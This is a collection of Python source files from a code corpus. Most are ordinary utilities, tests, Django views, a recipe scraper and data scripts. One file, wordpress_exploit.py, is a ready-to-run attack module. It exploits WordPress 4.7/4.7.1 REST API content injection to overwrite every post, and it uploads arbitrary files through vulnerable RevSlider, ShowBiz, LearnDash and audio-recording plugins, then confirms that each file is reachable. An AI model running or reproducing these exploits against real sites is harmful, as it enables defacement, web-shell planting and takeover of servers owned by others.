import VirtualFile as FileClass\n        else:\n            from OFS.Image import File as FileClass\n        self.assertEqual(isinstance(file_, FileClass), True)\n\n\ndef test_suite():\n    from unittest import TestSuite, makeSuite\n    suite = TestSuite()\n    suite.addTest(makeSuite(FlashVideoUnitTests))\n    suite.addTest(makeSuite(FlashVideoFunctionalTestCase))\n    suite.addTest(makeSuite(FlashVideoIntegrationTestCase))\n    return suite\n\n\nif __name__ == '__main__':\n    framework()","sub_path":"pycfiles/Products.FlashVideo-0.9-py2.4/test_FlashVideo.py","file_name":"test_FlashVideo.py","file_ext":"py","file_size_in_byte":11523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"484604488","text":"#-*- coding: utf-8 -*-\nimport requests,json,datetime,re\n \nclass wp_content_injection(object):\n \n    def get_version(self,target):\n        self.target = target\n        r = requests.get(self.target).text\n        version = re.findall('ver=(.*?)\"',r)\n        if len(version) == 0:\n            return None\n        else:\n            return version[0]\n \n    def get_id(self,target):\n        self.target = target\n        content_id = []\n        r = requests.get(f'{self.target}/wp/v2/posts')\n        for i in r.json():\n            content_id.append(i['id'])\n        return content_id\n \n    def post_inject(self,target,title,content_payload):\n        self.target = target\n        self.title = title\n        self.payload = content_payload\n        version = self.get_version(self.target)\n        if version == '4.7' or version == '4.7.1':\n            post_id = self.get_id(self.target)\n            for _id in post_id:\n                r = requests.post(\n                    f'{self.target}/wp/v2/posts/{str(_id)}/?id={str(_id)}',\n                    data = json.dumps({\n                        'title':self.title,\n                        'content':self.payload\n                    })\n                )\n                print(f'! Injecting Post ID : {_id}')\n        else:\n            print(f'[!] Wordpress version {version} is not vulnerable')\n\nclass wp_revslider(object):\n\n    def _wp_revslider(self,target,path_file,name_file):\n        self.target = target\n        self.path_file = path_file\n        self.name_file = name_file\n        post = requests.post(\n            f'{self.target}/wp-admin/admin-ajax.php',\n            data = {\n                'action':'revslider_ajax_action',\n                'client_action':'update_plugin'\n            },\n            files = {\n                'update_file':(self.name_file,open(self.path_file,'r').read())\n            }\n        )\n        post.close()\n        cek = requests.get(f'{self.target}/wp-content/plugins/revslider/temp/update_extract/{self.name_file}')\n        return cek.status_code,cek.url\n\nclass wp_learndash(object):\n\n    def _wp_learndash(self,target,path_file,name_file):\n        self.target = target\n        self.path_file = path_file\n        self.name_file = name_file\n        requests.post(\n            self.target,\n            data = {\n                'post':'foobar',\n                'course_id':'foobar',\n                'uploadfile':'foobar'\n            },\n            files = {\n                'uploadfiles[]':(self.name_file,open(self.path_file,'r').read())\n            } \n        )\n        cek = requests.get(f\"{self.target}/wp-content/uploads/assignments/{self.name_file}\")\n        return cek.status_code,cek.url\n\nclass wp_showbiz(object):\n\n    def _wp_showbiz(self,target,path_file,name_file):\n        self.target = target\n        self.path_file = path_file\n        self.name_file = name_file\n        requests.post(\n            f'{self.target}/wp-admin/admin-ajax.php',\n            data = {\n                'action':'showbiz_ajax_action',\n                'client_action':'update_plugin' \n            },\n            files = {\n                'update_file':(self.name_file,open(self.path_file,\"r\").read(),'text/html')\n            }\n        )\n        cek = requests.get(f\"{self.target}/wp-content/plugins/showbiz/temp/update_extract/{self.name_file}\")\n        return cek.status_code,cek.url\n\nclass wp_audio_control(object):\n\n    def _wp_audio_control(self,target,path_file,name_file):\n        self.target = target\n        self.path_file = path_file\n        self.name_file = name_file\n        
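# upload the recorded-audio blob through the plugin's save_record ajax action;\n        # the handler stores it under wp-content/uploads/<year>/<month>/, which the\n        # final GET below verifies\n        requests.post(\n            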
f'{self.target}/wp-admin/admin-ajax.php',\n            data = {\n                'audio-filename':self.name_file,\n                'action':'save_record',\n                'course_id':'undefined',\n                'unit_id':'undefined'\n            },\n            files = {\n                'audio-blob':(\n                    'blob',open(self.path_file,'r').read()\n                )\n            }\n        )\n        cek = requests.get(f'{self.target}/wp-content/uploads/{datetime.datetime.now().year}/{datetime.datetime.now().month:02}/{self.name_file}')\n        return cek.status_code,cek.url ","sub_path":"lib/exploit/wordpress_exploit.py","file_name":"wordpress_exploit.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"350824759","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.cluster import KMeans\n\ndf = pd.read_csv('data/bai4.csv')\n\nX = df[['Toan1', 'Toan2', 'Toan3', 'Toan4']]\n\nkm = KMeans(n_clusters=2, random_state=0)\nkm.fit(X)\n\nprint(km.labels_)\nprint('Centers found by scikit-learn:')\nprint(km.cluster_centers_)\n\n# evaluate the clustering SSE (smaller is better)\nprint('Distortion: %.2f' % km.inertia_)\n","sub_path":"KMeans/TH3.3.py","file_name":"TH3.3.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233107788","text":"#-*-coding:UTF-8\n'''\nCreated on 2016-8-3-11:15:25\nauthor: Gary-W\n'''\nimport os\nimport pickle\nimport shutil\nimport numpy as np\nimport json\n\n# get the abs path of every dir inside the given dir\ndef get_dirlist(root_dir, includes=[], excludes=[]):\n    \"\"\"\n    sample:\n    get_dirlist(r'../daytime_adaboost/pos')\n    \"\"\"\n    p = []\n    fns = os.listdir(root_dir)\n    for fn in fns:\n        okey = 0\n        if includes or excludes:\n            for inc in includes:\n                if inc in fn: okey = 1; break\n            for exc in excludes:\n                if exc in fn: okey = 0; break\n        else:\n            okey = 1\n        if okey:\n            fpath = os.path.join(root_dir, fn)\n            if os.path.isdir(fpath):\n                p.append(fpath)\n    return p\n\n# get all files' abs paths in the given dir; subfixs is a variable-length list of suffixes\ndef get_filelist(root_dir, *subfixs):\n    \"\"\"\n    sample:\n    get_filelist(r'../daytime_adaboost/pos',\".png\",\".jpg\")\n    \"\"\"\n    p = []\n    for subfix in subfixs:\n        p.extend([os.path.join(root_dir,f) for f in os.listdir(root_dir) if f.endswith(subfix)])\n    return p\n\n# get all files' names in the given dir; subfix is a variable-length parameter\ndef get_filenamelist(root_dir, *subfixs):\n    p = []\n    for subfix in subfixs:\n        p.extend([f for f in os.listdir(root_dir) if f.endswith(subfix)])\n    return p\n\n# get all files' abs paths in the given dir; prefix is a variable-length parameter\ndef get_prefilelist(root_dir, *prefixs):\n    p = []\n    for prefix in prefixs:\n        p.extend([os.path.join(root_dir,f) for f in os.listdir(root_dir) if f.startswith(prefix)])\n    return p\n\n# get all files' abs paths in the given tree; subfix is a variable-length parameter\ndef get_walkfilelist(root_dir, *subfixs):\n    fullpath = [] # absolute path in the tree\n    relate_path = [] # relative path in the tree\n    len_root = len(root_dir)\n    for root, _dirs, files in os.walk(root_dir): \n        for filespath in files:\n            for subfix in subfixs:\n                if filespath.endswith(subfix):\n                    p = os.path.join(root,filespath)\n                    fullpath.append(p)\n                    relate_path.append(p[len_root+1:]) # drop the leading path separator\n    return fullpath, relate_path\n\n
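# load a json file as a dict; the source path is stamped into the result under \"json_path\"\ndef load_json(path):\n    \"\"\"\n    note: JSON wants double-quoted strings and '/' separators, and must never end with a trailing \",\"\n    \"\"\"\n    js_table = None\n    try:\n        with open(path, 'r') as fr:\n            js_table = json.load(fr)\n        js_table[\"json_path\"] = path\n    except IOError as ioerr:\n        print(\"IO 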
Error:\"+str(ioerr)+\"in:\\n\"+path)\n return js_table\n\n# pickle files\ndef store_pickle(path, obj):\n try:\n with open(path, 'wb') as fw:\n pickle.dump(obj, fw)\n except IOError as ioerr: print(\"IO Error:\"+str(ioerr)+\"in:\\n\"+path)\n\ndef load_pickle(path):\n try:\n with open(path, 'rb') as fr:\n obj = pickle.load(fr)\n return obj\n except IOError as ioerr: print(\"IO Error:\"+str(ioerr)+\"in:\\n\"+path)\n\ndef save_npy(path, dict_data):\n np.save(path, dict_data)\n\ndef load_npy(path):\n # this can be used in py3.5\n data_dict = np.load(path, encoding=\"latin1\").item()\n return data_dict\n\n# create dir of training set based on src_dir & dst_dir\ndef create_dirs(src_dir, dst_dir):\n \"\"\"\n src_dir include:\n class1, class2, ... dir etc\n dst_dir include:\n train, val, train.txt, val.txt\n \"\"\"\n label_names = os.listdir(src_dir)\n for label in label_names:\n train_dir = os.path.join(dst_dir,\"train\", label)\n val_dir = os.path.join(dst_dir,\"val\", label)\n if not os.path.exists(train_dir):\n os.makedirs(train_dir)\n if not os.path.exists(val_dir):\n os.makedirs(val_dir)\n return label_names\n\n\n# copy src dir-tree 2 dst dir-tree, only include the files with given subfix \ndef copy_n_sel(src, dst, *ig_subfixs):\n if not os.path.exists(dst):\n os.makedirs(dst)\n _, sel_corr_paths = get_walkfilelist(src, ig_subfixs)\n dst_list = []\n for sel_p in sel_corr_paths:\n dst_path = os.path.join(dst, sel_p)\n src_path = os.path.join(src, sel_p)\n parent_dir = os.path.split(dst_path)[0]\n if not os.path.exists(parent_dir):\n os.makedirs(parent_dir)\n print(\"copying \",dst_path)\n shutil.copyfile(src_path,dst_path)\n dst_list.append(dst_path)\n return dst_list\n\n\n# find a Drive including the target dir in root directory\ndef getTargetDisk(tar_file=\"Location_PoseNet_Code_Dataset\"):\n candidate = [\"E:\",\"F:\",\"G:\",\"H:\",\"I:\"]\n for d in candidate:\n if os.path.isdir(d):\n tmpath = os.path.join(d, tar_file)\n if os.path.exists(tmpath):\n return d\n print(\"no valid disk\")\n return \"\"\n\ndef get_filesize(fpath):\n \"\"\"\n return the size(string-type) of a file\n \"\"\"\n \n def formatSize(bytes_number):\n # turn bytes number into kb\\m\\g unit\n try:\n bytes_number = float(bytes_number)\n kb = bytes_number / 1024\n except:\n print(\"invalid input format\")\n return(\"Error\")\n if kb >= 1024:\n M = kb / 1024\n if M >= 1024:\n G = M / 1024\n return(\"%fG\" % (G))\n else:\n return(\"%fM\" % (M))\n else:\n return(\"%fkb\" % (kb))\n \n return formatSize(os.path.getsize(fpath))\n\nclass MagaDict:\n def __init__(self, config_dict):\n self.config_dict = config_dict\n\n def __getitem__(self, key):\n try:\n print(key,\":\",self.config_dict[key])\n return self.config_dict[key]\n except:\n return None\n \n def __setitem__(self,key,value):\n print('\"'+key+'\"',\"<==\",value)\n self.config_dict[key] = value\n \n def savefile(self, file):\n with open(file,\"a\") as fa:\n for key in self.config_dict:\n fa.write(str(key)+\":\"+str(self.config_dict[key])+\"\\n\")\n \n \ndef restore_logs_to_file(dst_file, src_strlog):\n with open(dst_file,\"w\") as fw:\n for log in src_strlog:\n fw.write(log+\"\\n\")\n\ndef restore_logs_from_file(src_file):\n src_strlog = []\n with open(src_file,\"w\") as fw:\n for log in fw:\n src_strlog.append(log.strip(\"\\n\"))\n return src_strlog\n\n\n\nif __name__==\"__main__\":\n 
pass\n\n\n","sub_path":"src/utils/dataio.py","file_name":"dataio.py","file_ext":"py","file_size_in_byte":6354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"485502688","text":"\"\"\"Tests for 7kyu module\"\"\"\n\nimport pytest\n\nfrom tasks.kyu7 import (\n sum_of_square,\n sequence_sum,\n triple_shiftian,\n replicate,\n where_is_vasya,\n new_avg,\n angle,\n series_sum\n)\n\n\n@pytest.mark.parametrize('first_three_elements,num,expected_output', [\n ([1, 1, 1], 25, 1219856746),\n ([1, 2, 3], 25, 2052198929),\n ([6, 7, 2], 25, -2575238999),\n ([6, 7, 2], 2, 2)\n])\ndef test_triple_shiftian(first_three_elements, num, expected_output):\n \"\"\"Tests triple_shiftian function\"\"\"\n result = triple_shiftian(first_three_elements, num)\n assert result == expected_output\n with pytest.raises(TypeError) as err:\n assert triple_shiftian(-737, 'string') is err\n\n\n@pytest.mark.parametrize('times, number, expected_output',\n [\n (3, 5, [5, 5, 5]),\n (5, 1, [1, 1, 1, 1, 1]),\n (0, 12, []),\n (-1, 12, [])\n ])\ndef test_replicate(times, number, expected_output):\n \"\"\"Tests replicate function\"\"\"\n result = replicate(times, number)\n assert result == expected_output\n with pytest.raises(TypeError) as type_error:\n assert replicate(\"2\", [1]) is type_error\n\n\n@pytest.mark.parametrize('number, expected_result',\n [\n (3, 180),\n (4, 360)\n ])\ndef test_angle(number, expected_result):\n \"\"\"Tests angle function.\"\"\"\n result = angle(number)\n assert result == expected_result\n\n\ndef test_new_avg1():\n \"\"\"Tests new_avg function\"\"\"\n assert new_avg([14, 30, 5, 7, 9, 11, 15], 92) == 645\n\n\ndef test_new_avg():\n \"\"\"Tests new_avg function\"\"\"\n with pytest.raises(ValueError):\n new_avg([14, 30, 5, 7, 9, 11, 15], 2)\n\n\ndef test_series_sum():\n \"\"\"Tests series_sum function \"\"\"\n assert series_sum(1) == \"1.00\"\n assert series_sum(2) == \"1.25\"\n assert series_sum(3) == \"1.39\"\n assert series_sum(5) == \"1.57\"\n with pytest.raises(TypeError) as type_err:\n assert series_sum('a') is type_err\n assert series_sum(-5) == '1.00'\n\n\n@pytest.mark.parametrize(\"people, bef, aft, expected_output\", [\n (3, 1, 1, 2),\n (5, 2, 3, 3)],\n ids=[\"(3, 1, 1)_2\",\n \"(5, 2, 3)_3\"])\ndef test_where_is_vasya(people, bef, aft, expected_output):\n \"\"\"Tests where_is_vasya function.\"\"\"\n result = where_is_vasya(people, bef, aft)\n assert result == expected_output\n with pytest.raises(TypeError) as type_err:\n assert where_is_vasya('a') is type_err\n\n\n@pytest.mark.parametrize('data', [\n (2, 6, 2, 12),\n (1, 5, 1, 15),\n (1, 5, 3, 5),\n (0, 15, 3, 45),\n (16, 15, 3, 0),\n (2, 24, 22, 26),\n (2, 2, 2, 2),\n (2, 2, 1, 2),\n (1, 15, 3, 35),\n (15, 1, 3, 0)\n])\ndef test_sequence_sum(data):\n '''Tests sequence_sum function'''\n begin_number, end_number, step, result = data\n assert sequence_sum(begin_number, end_number, step) == result\n with pytest.raises(TypeError) as type_err:\n assert sequence_sum(1.23, 'asd', (1, 2)) is type_err\n\n\n@pytest.mark.parametrize('number, expected_output',\n [\n (7, 3432),\n (13, 10400600),\n (17, 2333606220),\n (19, 35345263800)\n ])\ndef test_sum_of_square(number, expected_output):\n \"\"\"test sum_of_square function\"\"\"\n result = sum_of_square(number)\n assert result == expected_output\n with pytest.raises(TypeError) as type_err:\n assert sum_of_square(-77) is 
type_err\n","sub_path":"unittest/tasks_test/test_kyu7.py","file_name":"test_kyu7.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"361367514","text":"from django.shortcuts import render, reverse, HttpResponseRedirect\nfrom recipe.models import Author, RecipeItem\nfrom recipe.forms import RecipeAddForm, AuthorAddForm, LoginForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login, logout, authenticate\n\n\ndef index(request):\n author = Author.objects.all()\n recipe = RecipeItem.objects.all()\n return render(request, 'index.html', {\"author_data\": author, \"recipe_data\": recipe})\n\n\ndef loginview(request):\n if request.method == \"POST\":\n form = LoginForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n user = authenticate(\n request,\n username=data[\"username\"],\n password=data[\"password\"]\n )\n if user:\n login(request, user)\n return HttpResponseRedirect(\n request.GET.get('next', reverse('homepage'))\n )\n form = LoginForm()\n return render(request, 'author_form.html', {'form': form})\n\n\n@login_required\ndef logoutview(request):\n logout(request)\n return HttpResponseRedirect(reverse('homepage'))\n\n\n# RECIPES\n\n@login_required\ndef recipe_edit(request, id):\n recipe = RecipeItem.objects.get(id=id)\n if request.method == 'POST':\n form = RecipeAddForm(request.POST)\n if request.user.author == recipe.author or request.user.is_staff:\n if form.is_valid():\n data = form.cleaned_data\n recipe.title = data['title']\n recipe.author = data['author']\n recipe.description = data['description']\n recipe.instructions = data['instructions']\n recipe.save()\n return HttpResponseRedirect(reverse('recipe_details', args=(id,)))\n form = RecipeAddForm(initial = {\n 'title': recipe.title, \n 'author': recipe.author,\n 'description': recipe.description,\n 'instructions': recipe.instructions, \n })\n return render(request, 'recipe_form.html', {'form': form})\n\n\n@login_required\ndef favorite_add(request, id):\n current_user = request.user.author\n favorite_recipe = RecipeItem.objects.get(id=id)\n current_user.favorite.add(favorite_recipe)\n current_user.save()\n return HttpResponseRedirect(reverse('recipe_details', args={id,})) \n\n@login_required\ndef favorite_remove(request, id):\n current_user = request.user.author\n favorite_recipe = RecipeItem.objects.get(id=id)\n current_user.favorite.remove(favorite_recipe)\n current_user.save()\n return HttpResponseRedirect(reverse('recipe_details', args={id,}))\n\n\ndef recipe_details(request, id):\n recipe = RecipeItem.objects.get(id=id)\n if request.user.is_authenticated:\n current_author = request.user.author.favorite.all()\n return render(request, \"recipe_details.html\", {\"recipe\": recipe, \"current_author\": current_author})\n return render(request, \"recipe_details.html\", {\"recipe\": recipe})\n\n\n@login_required\ndef recipe_add_views(request):\n html = \"recipe_form.html\"\n if request.method == \"POST\":\n form = RecipeAddForm(request.POST)\n if form.is_valid(): # MUST DO before every POST request\n data = form.cleaned_data\n RecipeItem.objects.create(\n title=data['title'],\n description=data['description'],\n instructions=data['instructions'],\n author=data['author']\n )\n return HttpResponseRedirect(reverse(\"homepage\"))\n form = RecipeAddForm()\n return render(request, html, {'form': form})\n\n\n# AUTHORS\n\ndef 
author_details(request, id):\n author = Author.objects.get(id=id)\n recipe_data = RecipeItem.objects.all()\n return render(request, \"author_details.html\", {\"author\": author, \"recipe_data\": recipe_data})\n\n\ndef author_add_views(request):\n form = AuthorAddForm()\n html = \"author_form.html\"\n if request.method == \"POST\":\n form = AuthorAddForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n new_user = User.objects.create_user(\n username=data['username'],\n password=data['password'],\n )\n new_user.save()\n new_author = Author(\n name=data['name'],\n bio=data['bio'],\n user=new_user,\n )\n new_author.save()\n return render(request, 'index.html', {'data': data, 'new_author': new_author}) \n return render(request, html, {'form': form})\n\n\n","sub_path":"recipe/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407683335","text":"from time import sleep\nimport re\nimport webscrapers.utils\n\nurl_basic = \"https://www.essen-und-trinken.de\"\nurl_archive = \"https://www.essen-und-trinken.de/rezepte/archiv\"\n\nfilename_skipped_recipes = \"skipped_eut.txt\"\n\n\ndef save_eut_recipes(scraped_recipes):\n for origin, recipes in scraped_recipes.items():\n file_path = origin + '.json'\n webscrapers.utils.save_recipes_to_json_file(recipes, file_path)\n\n\ndef scrap_skipped_eut_pages(path):\n with open(path, 'r') as f:\n urls = f.readlines()\n\n skipped_recipes = []\n scraped_recipes = dict()\n\n for recipe_url in urls:\n recipe_url = recipe_url.strip('\\n')\n\n soup_recipe = webscrapers.utils.create_soup_object(recipe_url)\n recipe = scrap_essen_und_trinken_recipe(soup_recipe, recipe_url)\n\n if all(['essen_und_trinken' not in recipe['origin'], 'Für_jeden_Tag' not in recipe['origin'],\n 'essen_und_trinken' not in recipe['origin']]):\n continue\n\n if recipe['origin'] not in scraped_recipes:\n scraped_recipes[recipe['origin']] = dict()\n scraped_recipes[recipe['origin']]['recipes'] = [recipe]\n\n else:\n scraped_recipes[recipe['origin']]['recipes'].append(recipe)\n\n sleep(1)\n\n save_eut_recipes(scraped_recipes)\n\n if len(skipped_recipes) > 0:\n webscrapers.utils.save_skipped_recipes_to_txt_file(skipped_recipes, filename_skipped_recipes)\n\n\ndef scrap_essen_und_trinken_pages():\n skipped_recipes = []\n scraped_recipes = dict()\n\n for i in range(0, 1145):\n recipe_links = []\n\n print(\"Seite \" + str(i + 1) + \" von 1145\")\n\n url = url_archive + '?page=' + str(i)\n soup = webscrapers.utils.create_soup_object(url)\n\n page_recipe_overview = soup.find(\"div\", class_=\"panel-panel panel-col\")\n\n for a_element in page_recipe_overview.find_all('a', href=True):\n if 'rzpt' in a_element['href']:\n recipe_links.append(a_element['href'])\n\n sleep(1.5)\n\n for recipe_url in recipe_links:\n soup_single_recipe_page = webscrapers.utils.create_soup_object(url_basic + recipe_url)\n\n try:\n recipe = scrap_essen_und_trinken_recipe(soup_single_recipe_page, url_basic + recipe_url)\n except Exception:\n print(\"Rezept übersprungen: \" + url_basic + recipe_url)\n\n skipped_recipes.append(url_basic + recipe_url)\n sleep(1.5)\n\n continue\n\n if all(['essen_und_trinken' not in recipe['origin'], 'Für_jeden_Tag' not in recipe['origin'],\n 'essen_und_trinken' not in recipe['origin']]):\n continue\n\n if recipe['origin'] not in scraped_recipes:\n scraped_recipes[recipe['origin']] = dict()\n scraped_recipes[recipe['origin']]['recipes'] = [recipe]\n else:\n 
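# a bucket for this source already exists, so just append the recipe\n                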
scraped_recipes[recipe['origin']]['recipes'].append(recipe)\n\n sleep(1.5)\n\n save_eut_recipes(scraped_recipes)\n\n if len(skipped_recipes) > 0:\n webscrapers.utils.save_skipped_recipes_to_txt_file(skipped_recipes, filename_skipped_recipes)\n\n\ndef get_origin_information_from_eut_recipe_page(soup):\n origin_element = soup.find(\"div\", class_=\"recipe-references\").find(\"div\", class_=\"source-reference\")\n\n if origin_element:\n return origin_element.text.split('\\n')[-1].strip(' ').replace(' ', '_').replace('/', '_')\n else:\n return \"essen_und_trinken\"\n\n\ndef get_servings_information_from_eut_recipe_page(soup, ingredients_element):\n servings_element = soup.find(\"div\", class_=\"servings\")\n\n if servings_element:\n return servings_element.text.strip()\n else:\n specific_serving_elements = ingredients_element.find(\"ul\", class_=\"ingredients-list\").find_all(\"li\",\n class_=\"ingredients-zwiti\")\n\n if len(specific_serving_elements) == 0:\n return 0\n else:\n return specific_serving_elements[0].text\n\n\ndef get_prep_time_information_from_eut_recipe_page(soup):\n prep_time_element = soup.find(\"div\", class_=\"time-preparation\")\n\n if prep_time_element:\n prep_time = soup.find(\"div\", class_=\"time-preparation\").text\n additional_prep_element = soup.find_all(\"div\", class_=\"time-addon\")\n\n if additional_prep_element:\n for additional_prep in additional_prep_element:\n prep_time += ' ' + additional_prep.text\n\n return prep_time\n else:\n return \"Nicht angegeben\"\n\n\ndef get_categories_information_from_eut_recipe_page(soup):\n category_page_element = soup.find(\"ul\", class_=\"taxonomies-list\")\n\n if category_page_element is None:\n return None\n else:\n categories_children = category_page_element.findChildren('li', recursive=False)\n categories = []\n\n for category_element in categories_children:\n categories.append(category_element.text)\n\n return categories\n\n\ndef get_ingredients_information_from_eut_recipe_page(ingredients_element):\n ingredients = []\n for ingredient_element in ingredients_element.find_all('li'):\n if len(ingredient_element.attrs) > 0:\n continue\n\n ingredients.append(re.sub(' +', ' ', ingredient_element.text.strip()))\n\n return ingredients\n\n\ndef get_prep_steps_information_from_eut_recipe_page(soup):\n prep_steps = []\n prep_steps_element = soup.find(\"ul\", class_=\"preparation\").findChildren(\"li\", class_=\"preparation-step\",\n recursive=False)\n\n for step in prep_steps_element:\n prep_steps.append(step.find(\"div\", class_=\"preparation-text\").text)\n\n return prep_steps\n\n\ndef get_recipe_titel_information_from_eut_recipe_page(soup):\n return soup.find(\"span\", class_=\"headline-title\").text\n\n\ndef scrap_essen_und_trinken_recipe(soup, recipe_url):\n ingredients_element = soup.find(\"section\", class_=\"ingredients\")\n\n recipe = {\n 'title': get_recipe_titel_information_from_eut_recipe_page(soup),\n 'url': recipe_url,\n 'page': 0,\n 'servings': get_servings_information_from_eut_recipe_page(soup, ingredients_element),\n 'prep_time': get_prep_time_information_from_eut_recipe_page(soup),\n 'categories': get_categories_information_from_eut_recipe_page(soup),\n 'ingredients': get_ingredients_information_from_eut_recipe_page(ingredients_element),\n 'steps': get_prep_steps_information_from_eut_recipe_page(soup)\n }\n\n return recipe\n\n\nif __name__ == '__main__':\n 
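# full crawl of all 1145 archive pages; the per-request sleep(1.5) makes this deliberately slow\n    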
scrap_essen_und_trinken_pages()\n","sub_path":"webscrapers/essen_trinken_scraper.py","file_name":"essen_trinken_scraper.py","file_ext":"py","file_size_in_byte":6706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"321135552","text":"import json\nimport pandas as pd\nfrom dateutil import parser\n\n# import new json data\njson_file = open('cmc.json')\ndata = json.load(json_file)\njson_file.close()\n\n# convert json data to list\ndates = list(data['data'].keys())\nprices = list(data['data'].values())\n\n# get dates and prices from lists\ndates_datetime = [parser.parse(date.split('T')[0]) for date in dates]\nmarketcap_price = [price[0] for price in prices]\n\n# build dataframe\ndf = pd.DataFrame({'Date': dates_datetime, 'Price': marketcap_price})\n\n# load previous data\nprev_df = pd.read_csv('Total_CMC.csv')\nprev_df[\"Date\"] = pd.to_datetime(prev_df[\"Date\"])\nprev_df.rename(columns={'Market Cap': 'Price'}, inplace=True)\nprev_df.reset_index(drop=True, inplace=True)\nprev_df = prev_df[prev_df['Price'].notna()]\n\n# Merge old with new data\nmerge_df = prev_df.merge(df, how=\"outer\", on='Date')\nmerge_df['Price_x'].fillna(merge_df['Price_y'], inplace=True)\ndel merge_df['Price_y']\nmerge_df.rename(columns={'Price_x': 'Price'}, inplace=True)\n\n# Export to csv\nmerge_df.to_csv('Total_CMC.csv', index=False)","sub_path":"risks/TotalMarketCap/merge_cmc_data.py","file_name":"merge_cmc_data.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"185049710","text":"#!/usr/bin/python\n\nimport json\nimport os\n\n\"\"\"\n This package is responsible of loading the required data and to pre-process\n them before storing them back to JSON format.\n There are two different outputs: one for the classification routines and \n one for the detection routines. The first one takes into account malicious \n code only.\n\"\"\"\n\n\ndef fetch_data(dataset_path, store=False, from_json=False):\n if from_json:\n with open(\"drebin_preproc.json\", \"r\") as f:\n data = json.load(f)\n else:\n data = load_dataset(dataset_path)\n if store:\n with open(\"drebin_preproc.json\", \"w\") as f:\n json.dump(data, f)\n\n return preprocess(data)\n\n\ndef preprocess(data):\n return ()\n\n\ndef load_dataset(dataset_path):\n \"\"\"\n Loads data from Drebin dataset and stores the information of each file in a\n dictionary with the file data + the pair name: file_name\n\n :param dataset_path: path of the drebin dataset\n :return: list of dictionaries containing files data.\n \"\"\"\n data = []\n hash = []\n i=0\n for file in os.listdir(dataset_path):\n if i >= 200:\n break\n # load file data\n data.append(parse_file(dataset_path, file))\n hash.append(file)\n i = i+1\n return data, hash\n\n\ndef parse_file(dataset_path, file_name):\n \"\"\"\n Build dictionary with 8 features + name:\n 0 - apk_hash : SHA1 of the apk file as name\n 1 - req_hw : requested hardware components\n 2 - req_perm : requested permissions (eg. contacts access)\n 3 - app_comp : components, eg. 
activities, services\n 4 - filt_int : filtered intents\n 5 - rstr_api : restricted API calls that require a permission\n 6 - use_perm : effectively used permissions\n 7 - susp_api : suspicious API calls\n 8 - use_urls : used network addresses embedded in the code\n The first 4 features were taken from the manifest.xml file while the others\n from the disassembled code.\n\n :param dataset_path: path of dataset\n :param file_name: name of the file in the format of SHA1 of the apk\n :return: dictionary of features.\n \"\"\"\n #list = []\n file_dict = {}\n with open(dataset_path+\"\\\\\"+file_name, \"r\") as f:\n for line in f:\n file_dict[line.strip()] = True\n #info = line.strip().split(\"::\")\n '''if info[0] == \"feature\":\n if \"req_hw\" in file_dict:\n file_dict[info[0]+\"req_hw\"+info[1]] = True;\n else:\n file_dict[\"req_hw\"] = [info[1]]\n elif info[0] == \"permission\":\n if \"req_perm\" in file_dict:\n file_dict[\"req_perm\"].append(info[1])\n else:\n file_dict[\"req_perm\"] = [info[1]]\n elif (info[0] == \"activity\"\n or info[0] == \"service_receiver\"\n or info[0] == \"provider\"\n or info[0] == \"service\"):\n if \"app_comp\" in file_dict:\n file_dict[\"app_comp\"].append(info[1])\n else:\n file_dict[\"app_comp\"] = [info[1]]\n elif info[0] == \"intent\":\n if \"filt_int\" in file_dict:\n file_dict[\"filt_int\"].append(info[1])\n else:\n file_dict[\"filt_int\"] = [info[1]]\n elif info[0] == \"api_call\":\n if \"rstr_api\" in file_dict:\n file_dict[\"rstr_api\"].append(info[1])\n else:\n file_dict[\"rstr_api\"] = [info[1]]\n elif info[0] == \"real_permission\":\n if \"use_perm\" in file_dict:\n file_dict[\"use_perm\"].append(info[1])\n else:\n file_dict[\"use_perm\"] = [info[1]]\n elif info[0] == \"call\":\n if \"susp_api\" in file_dict:\n file_dict[\"susp_api\"].append(info[1])\n else:\n file_dict[\"susp_api\"] = [info[1]]\n elif info[0] == \"url\":\n if \"use_urls\" in file_dict:\n file_dict[\"use_urls\"].append(info[1])\n else:\n file_dict[\"use_urls\"] = [info[1]]\n '''\n return file_dict\n\ndata, hash = load_dataset(\"C:\\\\Users\\\\Valerio\\\\Downloads\\\\Machine Learning\\\\HW\\\\drebin\\\\feature_vectors\")\nfrom sklearn.feature_extraction import DictVectorizer\nvec = DictVectorizer()\n\nprint(vec.fit_transform(data))\nprint(hash)\n","sub_path":"mandroid/dataset_preprocessing.py","file_name":"dataset_preprocessing.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"309531288","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom builtins import open\nfrom builtins import str\n\nfrom future import standard_library\nstandard_library.install_aliases()\n\n__all__ = [\n 'prepare_input_files_directory'\n]\n\nimport filecmp\nimport os\nimport shutil\n\nfrom pathlib2 import Path\n\nfrom ..utils.exceptions import OasisException\nfrom ..utils.path import as_path\n\n\ndef prepare_input_files_directory(\n target_dir,\n exposure_fp,\n exposure_profile_fp=None,\n keys_fp=None,\n lookup_config_fp=None,\n model_version_fp=None,\n accounts_fp=None,\n accounts_profile_fp=None,\n fm_aggregation_profile_fp=None,\n ri_info_fp=None,\n 